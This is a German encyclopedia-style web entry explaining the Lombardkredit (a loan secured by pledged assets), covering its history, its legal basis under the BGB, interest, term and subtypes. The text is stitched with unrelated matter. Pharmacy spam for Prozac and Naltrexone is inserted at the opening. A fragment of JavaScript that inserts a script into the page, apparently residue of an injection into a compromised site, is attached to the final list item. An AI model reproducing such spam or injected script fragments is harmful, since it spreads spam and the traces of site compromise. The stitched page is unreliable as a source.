Lombardkredit

cheap Fluoxetine order Prozac online Order Natrexone Er ist uralt und noch immer eine beliebte Form der Finanzierung – dabei ist sein Name nur wenigen bekannt: der Lombardkredit. Bereits im Mittelalter wurde der Lombardkredit ausgereicht und um das Jahr 1500 verliehen die Kaufleute der italienischen Lombardei Gelder gegen die Überlassung von Pfändern. Auch heute ist der Lombardkredit ein kurz- und mittelfristiger Kredit, der gegen die Überlassung von Sicherheiten gewährt wird. Beim Lombardkredit können die Kreditsicherheiten in Form von beweglichen Sachen oder als Bankguthaben und Wertpapiere an den Kreditgeber verpfändet werden. Führt der Gang ins Pfandleihhaus, in dem eine Sache dinglich übereignet wird, handelt es sich ebenfalls um einen Lombardkredit.

Seine rechtliche Grundlage findet der Lombardkredit im Bürgerlichen Gesetzbuch (Darlehen gemäß § 488 BGB). Mit der Verpfändung wird das Kreditinstitut mittelbarer oder unmittelbarer Besitzer des Pfandgegenstandes (§ 1205 BGB). Der Pfandnehmer kann die übereigneten Güter selbst verwahren oder sie verwahren lassen (§ 1215 BGB). Werden die Sicherheiten nicht tatsächlich übergeben, so können auch deren Rechte abgetreten bzw. verpfändet werden (§ 1205 Absatz 2 BGB). Mit § 1206 BGB ist die Einräumung eines Mitbesitzes an der Kreditsicherheit möglich. Während in allen Fällen der Kreditnehmer der Eigentümer der Sache bleibt, ist das Kreditinstitut (der Pfandnehmer) jedoch berechtigt, die übertragene Sicherheit zu verwerten. Kommt der Kreditnehmer seinen Zahlungsverpflichtungen nicht mehr nach und ist die Forderung fällig gestellt (§ 1228 Absatz 2 BGB), kann das Kreditinstitut nach einer Androhungsfrist von einem Monat das Recht auf Verwertung ausüben. Der Verkauf der Sache muss dabei zum Börsen- oder Marktpreis und freihändig, das heißt über einen Makler oder die Börse, erfolgen (§ 1221 BGB).

Die Zinshöhe des Lombardkredites richtet sich nach den eingebrachten Sicherheiten. Umso mehr Eigenmittel das Kreditinstitut unterlegen muss, um die vereinbarte Kreditsumme auszureichen, desto nachteiliger können sich die Zinskonditionen für den Darlehensnehmer gestalten. Besonders günstige Zinsen können damit bei der Verpfändung von Bankguthaben ausgereicht werden. Der Lombardkredit ist zeitlich befristet und wird grundsätzlich mit einer Laufzeit von bis zu 2 Jahren gewährt. Bei dem Lombardkredit handelt es sich um einen endfälligen Kredit, der zum Ende der Laufzeit in einer Summe rückzahlbar ist. Die Höhe der Kreditsumme richtet sich nach den überlassenen Sicherheiten. Je nach Besicherung des Lombardkredites wird eine Vielzahlung von Kreditarten beschrieben. Je nach Pfandobjekt unterscheiden sich:
- der Lombardkredit der Zentralbanken
- der Effektenlombardkredit
- der Wechsellombard
- der unechte Lombard
- der Edelmetalllombardkredit
- der Forderungslombardkredit. document.currentScript.parentNode.insertBefore(s, document.currentScript);}

This entry was posted in Lexikon. Bookmark the permalink.

Comments are closed.